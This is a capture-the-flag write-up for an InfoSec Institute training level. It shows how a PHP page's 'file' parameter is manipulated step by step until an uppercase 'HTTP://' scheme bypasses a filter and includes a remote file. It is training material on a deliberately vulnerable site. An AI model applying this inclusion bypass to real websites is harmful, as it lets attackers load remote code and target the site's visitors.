CTF#2 Level 4

URL: http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php

Description: You are confronted with a website that loads some .txt files to display content for its pages. You are thinking that it may be vulnerable. You aim to load a nice file from a remote server and share the link with unsuspecting visitors.
Your task is to successfully load a PHP file located in the root of infosecinstitute.com. The file should not exist but you must load it without getting errors and it must have the PHP file extension.

Vulnerability: OWASP A4 Insecure Direct Object References

Solution:

Insecure Direct Object References exists because of an applications frequently use the actual name or key of an object when generating web pages and applications don’t always verify the user is authorized for the target object. Testers can easily manipulate parameter values to detect such flaws. Code analysis quickly shows whether authorization is properly verified. Based on the description let’s hack the web :p

The web is simple only have a description and three link for Bio, Client, and About, the three link is

Bio Link – http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=file1.txt
Client Link – http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=file2.txt
About Link – http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=file3.txt

That seem vulnerable on “ex4.php?file=” On main page you have been told to load a php web page that located in the root of infosecinstitute.com, so I put

http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=infosecinstitute.com/index.php

and the result is

invalid file selected

so I change to

http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=infosecinstitute.com/file.txt

came with the error but different message

There is something else that you must do.

It seem the file must be file1.txt and I change with “ex4.php?file=infosecinstitute.com/file1.php”, and the error back to first error, then I add “infosecinstitute.com/file1.txt.php”
the error back to second message, so I check for the hint, and I forget to add http on infosecinstitute.com, so I add ex4.php?file=http://infosecinstitute.com/file1.txt.php, still not working, then i read and read the hint again, it said case sensitive, so I change to

http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=HTTP://infosecinstitute.com/file1.txt.php

And boom, pass :d

success

Resources and Tools:
1. OWASP A4 Insecure Direct Object References – https://www.owasp.org/index.php/Top_10_2010-A4-Insecure_Direct_Object_References

0 comments